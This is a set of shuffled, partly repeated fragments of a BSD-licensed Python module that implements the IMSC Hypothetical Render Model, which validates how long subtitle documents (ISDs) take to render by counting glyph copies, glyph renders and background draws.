"str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time,",
"HRM text drawing time ngra_t: Number = 0 # Total Normalized Rendered Glyph",
"# 1. Redistributions of source code must retain the above copyright notice, this",
"Total number of glyphs copied gren_count: Number = 0 # Total number of",
"def next_isd( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ) -> ISDStatistics: self.isd_stats",
"disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice,",
"nrga self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t += nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga",
"bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system:",
"time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def validate(isd_iterator:",
"len(char) != 1: raise ValueError(\"Argument must be a string of length 1\") return",
"glyph in self.back_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count +=",
"< last_offset: raise RuntimeError(\"ISDs are not in order of increasing offset\") stats =",
"the IMSC HRM. `isd_iterator` returns a sequence of tuplets `(begin, ISD)`, where `ISD`",
"''' if region.get_style(styles.StyleProperties.Opacity) == 0: return False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False",
"event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether the sequence of ISDs returned by `isd_iterator` conform to",
"index_n, is_last_isd_empty) self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d return self.isd_stats def _compute_dur_d( self, isd:",
"and br really be included -> yes for now # should br really",
"self.isd_stats.ngra_t += nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]):",
"0 # Number of backgrounds drawn clear: bool = False # Whether the",
"Normalized Rendered Glyph Area gcpy_count: Number = 0 # Total number of glyphs",
"def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether the sequence of ISDs returned",
"bg_color is not None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system:",
"styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType class HRM:",
"import Number import logging import ttconv.isd import ttconv.style_properties as styles import ttconv.model from",
"RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] != 0: nbg += 1 draw_area +=",
"python # -*- coding: UTF-8 -*- # Copyright (c) 2021, Pearl TV LLC",
"EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE",
"PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR",
"element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported",
"typing.Set[_Glyph] = set() self.isd_stats: ISDStatistics = None def next_isd( self, isd: typing.Type[ttconv.isd.ISD], index_n:",
"color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph in",
"3 _REN_G_CJK = 0.6 _REN_G_OTHER = 1.2 _NGBS = 1 _IPD = 1",
"of glyphs copied gren_count: Number = 0 # Total number of glyphs rendered",
"= 12 _GCPY_BASE = 12 _GCPY_OTHER = 3 _REN_G_CJK = 0.6 _REN_G_OTHER =",
"time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\\n\" f\" Glyph copy count: {stats.gcpy_count} | render",
"of backgrounds drawn clear: bool = False # Whether the root container had",
"time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def debug(self,",
"# HRM ISD time dur_d: Number = 0 # HRM background drawing time",
"stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether the sequence of ISDs",
"front_buffer = set() if isd is not None: for region in isd.iter_regions(): if",
"= _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) )",
"this # list of conditions and the following disclaimer. # 2. Redistributions in",
"included -> no if isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is",
"must retain the above copyright notice, this # list of conditions and the",
"event_handler.error(\"Rendering time exceeded\", doc_index, time_offset, avail_render_time, stats) if stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\",",
"fontSize units: {font_size.units}\") return font_size.value * font_size.value / 10000 def _compute_ren_g(char: str): if",
"@staticmethod def _format_message(msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): return",
"materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE",
"\"<NAME> <<EMAIL>>\" import typing from dataclasses import dataclass from fractions import Fraction from",
"IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE #",
"_Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if",
"int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def",
"+= nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size:",
"content class EventHandler: '''Allows a callee to inform the caller of events that",
"OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER",
"copied gren_count: Number = 0 # Total number of glyphs rendered is_empty: bool",
"by the caller. ''' @staticmethod def _format_message(msg: str, doc_index: int, time_offset: Fraction, available_time:",
"an ISD instance whose active interval starts at `begin` seconds and ends immediately",
"/ 10000 def _compute_ren_g(char: str): if len(char) != 1: raise ValueError(\"Argument must be",
"_BDRAW def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer = set() if",
"str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time,",
"styles.DisplayType.none: return False if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return",
"region in isd.iter_regions(): if not _is_presented_region(region): continue for element in region.dfs_iterator(): if not",
"br really be included -> no if isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor)",
"# Total number of glyphs copied gren_count: Number = 0 # Total number",
"ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED #",
"had to be cleared dur_t: Number = 0 # HRM text drawing time",
"GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE = 12 _GCPY_OTHER = 3",
"drawing time ngra_t: Number = 0 # Total Normalized Rendered Glyph Area gcpy_count:",
"documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE",
"stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index, time_offset,",
"if not (stats.is_empty and is_last_isd_empty): last_offset = time_offset is_last_isd_empty = stats.is_empty @dataclass(frozen=True) class",
"element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize units: {font_size.units}\") return font_size.value",
"ord(char) in GCPY_12 else _GCPY_OTHER def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent) if",
"# list of conditions and the following disclaimer. # 2. Redistributions in binary",
"logging import ttconv.isd import ttconv.style_properties as styles import ttconv.model from ._gcpy_codepoints import GCPY_12",
"a callee to inform the caller of events that occur during processing. Typically",
"ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines",
"= ISDStatistics() self._compute_dur_t(isd, index_n) self._compute_dur_d(isd, index_n, is_last_isd_empty) self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d return",
"the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND",
"if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is",
"Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def warn(self, msg:",
"number of glyphs rendered is_empty: bool = False # Does the ISD contain",
"def _compute_gcpy(char: str): if len(char) != 1: raise ValueError(\"Argument must be a string",
"count: {stats.gren_count} | Background draw count: {stats.nbg_total} | Clear: {stats.clear}\\n\" ) def info(self,",
"that the following conditions are met: # # 1. Redistributions of source code",
"HRM background drawing time nbg_total: Number = 0 # Number of backgrounds drawn",
"GCPY_12 else _GCPY_OTHER def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent) if region_extent.width.units is",
"def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0: return False if",
"0 # HRM text drawing time ngra_t: Number = 0 # Total Normalized",
"through callbacks on the `event_handler`. ''' hrm = HRM() last_offset = 0 is_last_isd_empty",
"doc_index == 0 else time_offset - last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering time",
"for region in isd.iter_regions(): if not _is_presented_region(region): continue for element in region.dfs_iterator(): if",
"True for doc_index, (time_offset, isd) in enumerate(isd_iterator): if time_offset < last_offset: raise RuntimeError(\"ISDs",
"= stats.is_empty @dataclass(frozen=True) class _Glyph: char: str color : styles.ColorType font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]]",
"`isd_iterator` conform to the IMSC HRM. `isd_iterator` returns a sequence of tuplets `(begin,",
"for element in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text): continue parent = element.parent() nrga",
"the following conditions are met: # # 1. Redistributions of source code must",
"# Does the ISD contain any content class EventHandler: '''Allows a callee to",
"index_n: int, is_last_isd_empty: bool ) -> ISDStatistics: self.isd_stats = ISDStatistics() self._compute_dur_t(isd, index_n) self._compute_dur_d(isd,",
"OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF",
"whether the sequence of ISDs returned by `isd_iterator` conform to the IMSC HRM.",
"DAMAGE. '''Hypothetical Render Model (HRM)''' __author__ = \"<NAME> <<EMAIL>>\" import typing from dataclasses",
"is not None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\")",
"draw_area = 0 if index_n == 0 or is_last_isd_empty else 1 self.isd_stats.clear =",
"Whether the root container had to be cleared dur_t: Number = 0 #",
"ends immediately before the `begin` value of the next ISD. Errors, warnings and",
"doc_index, time_offset, available_time, stats)) def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time:",
"avail_render_time, stats) if stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed",
"overridden by the caller. ''' @staticmethod def _format_message(msg: str, doc_index: int, time_offset: Fraction,",
"IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF",
"logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE = 12 _GCPY_OTHER = 3 _REN_G_CJK = 0.6",
"SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND #",
"bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8:",
"None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3]",
"isd: typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer = set() if isd is not None:",
"ttconv.isd import ttconv.style_properties as styles import ttconv.model from ._gcpy_codepoints import GCPY_12 LOGGER =",
"def _compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ): self.isd_stats.is_empty = True",
"in isd.iter_regions(): if not _is_presented_region(region): continue for element in region.dfs_iterator(): if not isinstance(element,",
"/ _compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif glyph in self.back_buffer: self.isd_stats.dur_t += nrga /",
"1\") return _REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER def _compute_gcpy(char:",
"font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph in front_buffer: self.isd_stats.dur_t",
"<= ord(char) <= 0x9FFF else _REN_G_OTHER def _compute_gcpy(char: str): if len(char) != 1:",
"raise RuntimeError(f\"Unsupported extent height units: {region_extent.height.units}\") return region_extent.width.value * region_extent.height.value / 10000 def",
"font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize units:",
"SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED",
"HRM: def __init__(self): self.back_buffer: typing.Set[_Glyph] = set() self.isd_stats: ISDStatistics = None def next_isd(",
"WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF",
"cleared dur_t: Number = 0 # HRM text drawing time ngra_t: Number =",
"time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def warn(self,",
"Redistributions in binary form must reproduce the above copyright notice, # this list",
"font_size: styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color:",
"ISD contain any content class EventHandler: '''Allows a callee to inform the caller",
"units: {region_extent.width.units}\") if region_extent.height.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent height units: {region_extent.height.units}\")",
"import ttconv.style_properties as styles import ttconv.model from ._gcpy_codepoints import GCPY_12 LOGGER = logging.getLogger(__name__)",
"to be cleared dur_t: Number = 0 # HRM text drawing time ngra_t:",
"HRM time: {float(stats.dur):.3f}\\n\" f\" Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count} |",
"THE POSSIBILITY OF SUCH DAMAGE. '''Hypothetical Render Model (HRM)''' __author__ = \"<NAME> <<EMAIL>>\"",
"Total Normalized Rendered Glyph Area gcpy_count: Number = 0 # Total number of",
"SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS",
"> avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index, time_offset, avail_render_time, stats) if stats.ngra_t > 1:",
"* region_extent.height.value / 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) ==",
"# should transparent backgrounds really be counted? -> NO # should span and",
"_compute_gcpy(char) self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t += nrga / _compute_ren_g(char)",
"messages are signalled through callbacks on the `event_handler`. ''' hrm = HRM() last_offset",
"bool ): self.isd_stats.is_empty = True draw_area = 0 if index_n == 0 or",
"at `begin` seconds and ends immediately before the `begin` value of the next",
"2021, Pearl TV LLC # # Redistribution and use in source and binary",
"should br really be included -> no if isinstance(element, ttconv.model.Br): continue bg_color =",
"None: for region in isd.iter_regions(): if not _is_presented_region(region): continue for element in region.dfs_iterator():",
"available_time, stats)) def error(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats:",
"# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"",
"of source code must retain the above copyright notice, this # list of",
"COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,",
"no if isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not None:",
"warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index,",
"Number import logging import ttconv.isd import ttconv.style_properties as styles import ttconv.model from ._gcpy_codepoints",
"LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND #",
"region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return False bg_color: styles.ColorType =",
"def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not styles.LengthType.Units.rh: raise",
"= element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise",
"stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def error(self, msg: str, doc_index: int,",
"TV LLC # # Redistribution and use in source and binary forms, with",
"return False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False if region.has_children(): return True if",
"notice, # this list of conditions and the following disclaimer in the documentation",
"Number = 0 # Number of backgrounds drawn clear: bool = False #",
"https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0: return False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return",
"styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False if region.has_children(): return True",
"time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): return ( f\"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\\n\"",
"typing from dataclasses import dataclass from fractions import Fraction from numbers import Number",
"'''Allows a callee to inform the caller of events that occur during processing.",
"the next ISD. Errors, warnings and info messages are signalled through callbacks on",
"other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY",
"MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT",
"_compute_ren_g(char: str): if len(char) != 1: raise ValueError(\"Argument must be a string of",
"char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph",
"styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType",
"int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def",
"nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer = front_buffer",
"return False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return",
"ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT",
"_compute_nrga(element) for char in element.get_text(): glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle),",
"_region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent) if region_extent.width.units is not styles.LengthType.Units.rw: raise RuntimeError(f\"Unsupported",
"0 if isd is not None: for region in isd.iter_regions(): if not _is_presented_region(region):",
"nbg self.isd_stats.dur_d = draw_area / _BDRAW def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n: int",
"region.get_style(styles.StyleProperties.Extent) if region_extent.width.units is not styles.LengthType.Units.rw: raise RuntimeError(f\"Unsupported extent width units: {region_extent.width.units}\") if",
"OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF",
"be excluded? -> NO # should transparent backgrounds really be counted? -> NO",
"text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph in front_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char)",
"stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def debug(self, msg: str, doc_index: int,",
"ISD)`, where `ISD` is an ISD instance whose active interval starts at `begin`",
"font_size.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize units: {font_size.units}\") return font_size.value * font_size.value",
"raise RuntimeError(f\"Unsupported extent width units: {region_extent.width.units}\") if region_extent.height.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported",
"INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT",
"glyphs rendered is_empty: bool = False # Does the ISD contain any content",
"# Redistribution and use in source and binary forms, with or without #",
"seconds and ends immediately before the `begin` value of the next ISD. Errors,",
"EventHandler: '''Allows a callee to inform the caller of events that occur during",
"= 0 # Total number of glyphs copied gren_count: Number = 0 #",
"in enumerate(isd_iterator): if time_offset < last_offset: raise RuntimeError(\"ISDs are not in order of",
"0 or is_last_isd_empty else 1 self.isd_stats.clear = draw_area != 0 if isd is",
"Total number of glyphs rendered is_empty: bool = False # Does the ISD",
"be included -> yes for now # should br really be included ->",
"{stats.clear}\\n\" ) def info(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats:",
"False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False",
"self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif glyph in self.back_buffer: self.isd_stats.dur_t",
"should body elements really be excluded? -> NO # should transparent backgrounds really",
"-> no if isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not",
"- last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index, time_offset, avail_render_time, stats)",
"_compute_gcpy(char: str): if len(char) != 1: raise ValueError(\"Argument must be a string of",
"source code must retain the above copyright notice, this # list of conditions",
"time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index, time_offset, avail_render_time, stats) if not (stats.is_empty and",
"if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return False bg_color: styles.ColorType",
"retain the above copyright notice, this # list of conditions and the following",
"= logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE = 12 _GCPY_OTHER = 3 _REN_G_CJK =",
"self.isd_stats.dur_t += nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer",
"False # Whether the root container had to be cleared dur_t: Number =",
"return font_size.value * font_size.value / 10000 def _compute_ren_g(char: str): if len(char) != 1:",
"are permitted provided that the following conditions are met: # # 1. Redistributions",
"NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS",
"ISD instance whose active interval starts at `begin` seconds and ends immediately before",
"if bg_color.components[3] != 0: nbg += 1 draw_area += _region_normalized_size(region) * nbg self.isd_stats.nbg_total",
"font_size.value * font_size.value / 10000 def _compute_ren_g(char: str): if len(char) != 1: raise",
"length 1\") return _REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER def",
"is not styles.LengthType.Units.rw: raise RuntimeError(f\"Unsupported extent width units: {region_extent.width.units}\") if region_extent.height.units is not",
"-*- # Copyright (c) 2021, Pearl TV LLC # # Redistribution and use",
"stats.dur > avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index, time_offset, avail_render_time, stats) if stats.ngra_t >",
"continue parent = element.parent() nrga = _compute_nrga(element) for char in element.get_text(): glyph =",
"= 0 # Total Normalized Rendered Glyph Area gcpy_count: Number = 0 #",
"USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH",
"if len(char) != 1: raise ValueError(\"Argument must be a string of length 1\")",
"font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType class",
"elements really be excluded? -> NO # should transparent backgrounds really be counted?",
"region_extent.height.value / 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0:",
"draw_area += _region_normalized_size(region) * nbg self.isd_stats.nbg_total += nbg self.isd_stats.dur_d = draw_area / _BDRAW",
"doc_index, time_offset, available_time, stats)) def error(self, msg: str, doc_index: int, time_offset: Fraction, available_time:",
"TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE",
"ISDs returned by `isd_iterator` conform to the IMSC HRM. `isd_iterator` returns a sequence",
"self.isd_stats.dur_t + self.isd_stats.dur_d return self.isd_stats def _compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty:",
"NO # should transparent backgrounds really be counted? -> NO # should span",
"binary forms, with or without # modification, are permitted provided that the following",
"True draw_area = 0 if index_n == 0 or is_last_isd_empty else 1 self.isd_stats.clear",
"self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t += nrga / _compute_ren_g(char) self.isd_stats.ngra_t",
"nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType",
"Errors, warnings and info messages are signalled through callbacks on the `event_handler`. '''",
"2. Redistributions in binary form must reproduce the above copyright notice, # this",
"{float(time_offset):.3f}s (doc #{doc_index})\\n\" f\" available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\\n\" f\" Glyph",
"_REN_G_CJK = 0.6 _REN_G_OTHER = 1.2 _NGBS = 1 _IPD = 1 @dataclass",
"1.2 _NGBS = 1 _IPD = 1 @dataclass class ISDStatistics: dur: Number =",
"stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def warn(self, msg: str, doc_index: int,",
"ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN",
"ttconv.style_properties as styles import ttconv.model from ._gcpy_codepoints import GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW",
